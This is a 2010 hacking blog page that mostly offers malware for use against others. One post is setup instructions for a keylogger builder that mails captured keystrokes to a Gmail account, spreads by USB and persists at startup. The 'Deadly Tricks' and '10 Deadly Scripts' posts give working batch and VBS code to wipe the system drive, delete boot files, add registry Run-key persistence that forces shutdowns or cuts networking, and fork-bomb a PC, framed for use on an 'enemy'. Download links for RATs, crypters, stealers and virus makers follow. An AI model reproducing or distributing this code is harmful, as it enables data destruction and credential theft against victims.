Popular Posts

Dscreet Keylogger 3.0

Posted: Saturday, October 30, 2010 by Fyaz Ahmad in
0



How to use
Gmail User: Enter the gmail (*)(*)(*)(*)(*)(*)(*)(*) for the account in which
you want to recieve the logs.

Gmail Pass: Password for the gmail account you entered above.

Server Name: The name you want the virus file to be.

Interval: How often you want to recieve logs to your email account.
shorter interval means smaller logs more often and longer means
larger logs less often. MAKE SURE TO PUT THE TIME IN SECONDS E.G. 1MIN = 60SEC.

Download Link (optional): If the downloader checkbox is ticked, put the direct url to the
file you want to download e.g. rat/botnet here.

Anti's: Select this checkbox if you want to activate process killers.

Add To Startup: Select this checkbox if you want your server to be run every time the victims computer
starts up. (recommended)

USB Spread: Select this checkbox if you want to enable USB spreading.

Delete Cookies: Select this checkbox if you want to victim to have to enter all their saved passwords
again. (recommended)

Downloader: Explained above.

Kill Taskmanager: Disables the victims taskmanager.

Icon Changer: Select this checkbox and use the "Load Icon" button to change the icon of your server file when it
is created.

Fake Error: Select this checkbox and use the "Fake Error Message" box to create an error message that
will be shown when the server is run on the victims computer.





http://www.sendspace.com/file/nuwee9

Earth keylogger v1 (FUD)

Posted: Saturday, October 9, 2010 by Fyaz Ahmad in
1

Some Deadly Tricks ! Read Carefully!

Posted: by Fyaz Ahmad in
0


Trick 1 :
Delete my document :

A WAY TO DELETE THE MY DOCUMENTS FOLDER OF UR ENEMY OR JUST 4 FUN.HERE'S WHAT U SHOULD DO.

rmdir C:\Documents and Settings \S\Q.

OPEN NOTEPAD AND COPY-PASTE THE ABOVE CODE IN IT.THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT BE SURE TO SAVE IT AS A BAT FILE.I MEAN SAVE IT LIKE MYVIRUS.BAT.IT SHOULD HAVE THE ENDING AS .BAT.NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.

Trick 2 :

Open notepad and type the code below:

lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")

Then save it as Virus.VBS
note : this one is not harmful just to scare you

Trick 3 :
here is the code of a virus
which will open and close your cdrom copy paste code inside equals in notepad
=========================================
'code start from here

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If

'code end from here
=========================================

save it as virus.vbs and double click it
and if u want to close it just open task manager and end wscript.exe


Trick 4 :

@echo off
start WISPTIS.EXE
start WISPTIS.EXE
start WISPTIS.EXE
start WISPTIS.EXE
start WISPTIS.EXE
start WISPTIS.EXE


open notepad and save it as anyname.bat
this will stop your mouse cursor
to fix it log off your pc


Trick 5 :
Note this one is best trick to slow down pc

open notepad
type

do
loop


save it as anyname.vbs

and click on it once twice thrice anytime to make pc too slow .
Open task managar you can see 100% CPU usage . to restore to normal close all wscript.exe from task manager .

Store 7Gb with Gmail Drive !

Posted: by Fyaz Ahmad in
0


It forms a New Drive at My Computer just like C: drive, and you can directly Login from here to your Personal Gmail Account without going to Any Browser and you don't need to wait long time to Upload stuff in there.. but you just have to copy and paste it over there..like you do in other drives

and Yeah!! its uploaded on your Gmail account Instantly.

So technically it acts a 7 GB flash drive extension where you can upload any stuff and access it anywhere for free..

Some More info about it :

GMail Drive is a Shell Name space Extension that creates a virtual drive in the Windows Explorer, allowing you to use your Google Gmail account as a storage medium.
It allows you to do basic file manipulation, such as copy and delete of files inside the Gmail account. Because it is a Shell Extension, the interface you work in is Windows Explorer itself.
GMail Drive appears as a virtual drive under your My Computer folder in Windows
Explorer

Please note that GMail Drive is still an experimental tool. There's still a number of limitations of the file-system (such as total filename size must be less than 65 characters). Since the tool hooks up with the free Gmail Service provided by Google, changes in the Gmail system may break the tool's ability to function. I cannot guarantee that files stored in this manner will be accessible in the future.

Download Free :
GMail Drive v1.0.14 - download site #1 (Softpedia)
GMail Drive v1.0.14 - download site #2 (Betanews)

10 Deadly Scripts !

Posted: by Fyaz Ahmad in
2




Warning : Please Use ALL At Your Own Risk.Never Try On Your Own Pc
Let Your Enemy See Your Power

Now below i am posting some codes which are known as "Deadly"

All Scripts Here Are To Be Copied In NotePad


#1.This Will Delete All The Content Of A Drive

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat

#2.This Will Just Restart Your Pc

@echo off
shutdown -r -f -t 00

Save The Above Code As Anything.bat


#3.This Will Crash Ur Computer
.
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
.
Save It As Anything.vbs
It Only Works With Windows XP

#4.

echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* nul >>c:\autoexec.bat
echo copy c:\******s\command\forma.com c:\ >nul >>c:\autoexe.bat
echo copy c:\******s\command/deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltre /y c:\******s\*.* >nul >>c:\autoexec.bat
echoformat c:/q /u /autotest >nul >>c:\autoexe.bat
.
Save It As Anything.bat
No Idea About The After Effects OF This Virus

#5.The Most Simple Virus To Crush The Window
.
@Echo off
Del C:\ *.* |y
.
Save It As Anything.bat

#6.This will crash ur computer

: loop
start cmd.exe
goto loop
.
Save As Anything.bat

#7.Script that crashes pc
.
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!

#8.Shutdowns Computer Everytime It Is Turned On
.
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

#9.Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

#10.Change Files To Non-working TXT Files

REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

How To Use A Trial Software Forever Legally

Posted: by Fyaz Ahmad in
2


Time Stopper is the software which can stop the time for try out version software. When you stop the time you can use your try-out versions forever. When you stop the time of a try-out version using this Time Stopper it works via this Time Stopper. Real time and date run normally on your system. You can use any number of try-out version softwares with this software.
 
How it Works

1. Open Time Stopper
2. Browse and select .exe of required trial software
3. Choose the new date (Any date which occurs in between your trial software time period before expiration, suggestion: set it to two days before trial software expiration date.)
4. Choose any time
5. Click open software on your selected date

If you wish to create an icon for your modified trial software and do not want to open Time stopper every time then use last button in software to create new icon. open that trial software after that from that newly created icon always otherwise it can expire.

This is 100% free and 100% legal!!

DOWNLOAD

RudeboysMalware Crypter

Posted: by Fyaz Ahmad in
0

Haze Steal0r

Posted: Thursday, October 7, 2010 by Fyaz Ahmad in
0

HatRia Keylogger V1.24

Posted: Tuesday, October 5, 2010 by Fyaz Ahmad in
0

Report Dead Links Here

Posted: Monday, October 4, 2010 by Fyaz Ahmad in
1

Hi All,

Please report any dead links here. We will try to get you new links.

If we are unable to get the new links we will delete the post.

Thanks for understanding.

Regards,



FYAZHACKS

IMC Tools Hack Pack

Posted: Sunday, October 3, 2010 by Fyaz Ahmad in
0


• IMC Grahams Trojan
• IMC Ice Dragon
• Myspace Password Cracker
• IMC Myspace Phisher
• Ultra Surf
• Rapid Share Account Gen
• MSN Nudge Madness
• Ice Reloaded MSN Freezer
• IMC Handbook
• BrutusAE2
• Lord PS
• Hoax Toolbox
• IMC Word List
• Blues Port Scanner
• Bandook RAT v1.35
• Project Satan 2.0
• EES binder v1.0
• File Injector v3
• Remote Desktop Spy v4.0
• Passive Terror v1.3 Final Edition
• Dyn-DL (Dynamic downloader)
• Silent Assassin v2.0
• Net Scan Tools v4.2
• Rocket v1.0
• NStealth HTTP Security Scanner v5.8
• Attack Toolkit v4.1 & source code included
• Legion NetBios Scanner v2.1
• Battle Pong
• TeraBIT Virus Maker v2.8
• p0kes WormGen 2.0
• JPS Virus Maker
• IRC Ban Protection
• IRC Mega Flooder
• FTP Brute Hacker
• RAR Password Cracker
• Vbulletin 3.6.5 Sql Injection Exploit
• IPB 2-2.1.5 Sql Injection Exploit
• IPB 2-2.1.7 Exploit
• Cain & Abel v4.9.3
• NetStumbler 0.4.0
• Cryptor 1.2
• VNC Crack
• Hamachi 0.9.9.9
• pbnj-1.0
• Mutilate File Wiper 2.92

http://rapidshare.com/files/22242155...dl4all.com.rar

http://www.mediafire.com/?lf0k1g0df2xseuw

http://www.4shared.com/file/GoOOK0td...wdl4allco.html

Host Botnet v2.0 [your Own Risk]

Posted: by Fyaz Ahmad in
0

Blind Cat - Blind SQL Injection Exploitation tool

Posted: by Fyaz Ahmad in
0


Blind Cat is Updated to v0.0.1.1. No More Problems With SSL Certificates

The experimental multithreaded tool (Blind Cat) is running multiple instances of CURL, which send parametrized HTTP requests to the vulnerable web application. Then responses are analyzed and another requests with modified parameters are issued until the correct characters in SQL response are detected

This tool supports almost all databases – MS SQL, MySQL, Oracle, DB2, Firebird, etc., while supporting both – HTTP and HTTPS! In addition to that, it can transmit custom HTTP requests.














Info +]VIdeo Tutorial


DOWNLOAD

DllHijackAuditor 2.1

Posted: by Fyaz Ahmad in
0

DllHijackAuditor is the smart tool to Audit against the Dll Hijacking Vulnerability in any Windows application. This is recently discovered critical security issue affecting almost all Windows systems on the planet. It appears that large amount of Windows applications are currently susceptible to this vulnerability which can allow any attacker to completely take over the system.
DllHijackAuditor helps in discovering all such Vulnerable Dlls in a Windows application which otherwise can lead to successful exploitation resulting in total compromise of the system. With its simple GUI interface DllHijackAuditor makes it easy for anyone to instantly perform the auditing operation. It also presents detailed technical Audit report which can help the developer in fixing all vulnerable points in the application.

New version v2 brings out following features,

* New & Smart Debugger based 'Interception Engine' for consistent and efficient performance.
* Support for specifying as well as auditing of application with custom & multiple Extensions.
* Timeout Configuration to alter the waiting time for each Application.



DllHijackAuditor ready for the auditing operation





DllHijackAuditor after the completion of Phase 1 (Vulnerability Testing) of auditing operation of WireShark.exe





DllHijackAuditor after the completion of Phase 2 (Exploitation) of auditing operation of WireShark.exe





Complete Audit report generated by DllHijackAuditor as last phase of auditing operation of WireShark.exe





VIDEO DEMO
YouTube - DllHijackAuditor - Auditing WireShark for Dll Hijack Vulnerability


MORE INFO
DllHijackAuditor : Smart Tool to Audit the DLL Hijack Vulnerability - www.SecurityXploded.com







MEGAUPLOAD - The leading online storage and file delivery service

Tiroloko Crypter V1.2

Posted: by Fyaz Ahmad in
0

UnHackMe 5.99 Portable

Posted: by Fyaz Ahmad in
0


UnHackMe 5.99 Portable | 11.2 MB


UnHackMe First BootWatch AntiRootkit! Now it is the must have tool for you! UnHackMe is specially designed to detect and remove Rootkits (a new generation of Trojan programs invisible Trojans). A rootkit is a program that a hacker uses to mask intrusion and obtain administrator level access to a computer or computer network.
The intruder installs a rootkit on a computer using a user action or by exploiting a known vulnerability or cracking a password. The rootkit installs a backdoor giving the hacker a full control of the computer. It hides their files, registry keys, and process names, and network connections from your eyes. Your antivirus could not detect such programs because they use compression and encryption of its files. The sample software is Hacker Defender rootkit. UnHackMe allows you to detect and remove Rootkits.

Benefits:
UnHackMe Pro includes special designed tools for detecting deep hidden rootkits.
UnHackMe Pro is unique for each user and it is invisible for a rootkit.
You can open UnHackMe Pro from CD ROM or from a flash drive.
You can use UnHackMe Pro license for checking and removing rootkits from user computers.
No need to install UnHackMe on a user computer.
No need to purchase additional licenses.
Easy in use. No comments!


Download Links

Hotfile.com: 1 klik file hosting: UnHackMe_v5.99_Portable_DMZ.rar

TeraBIT Virus Maker 3.2

Posted: Friday, October 1, 2010 by Fyaz Ahmad in
5







                          
                          http://hotfile.com/dl/72985497/8fbdae8/TeraBIT_Virus_Maker_3.2.rar.html



                              http://rapidshare.com/files/422475555/TeraBIT_Virus_Maker_3.2.rar
                                                      

xHacker Pro 3.0

Posted: by Fyaz Ahmad in
0






                                http://hotfile.com/dl/72986805/31e254d/xhacker_pro_3.0.rar.html

                                  http://rapidshare.com/files/422476450/xhacker_pro_3.0.rar                                                   

X Remote Administration tool 2.0

Posted: by Fyaz Ahmad in
0







 
                   http://hotfile.com/dl/72982551/2015391/X_Remote_Administration_tool_2.0.rar.html
     
                        http://rapidshare.com/files/422473571/X_Remote_Administration_tool_2.0.rar

Related Posts with Thumbnails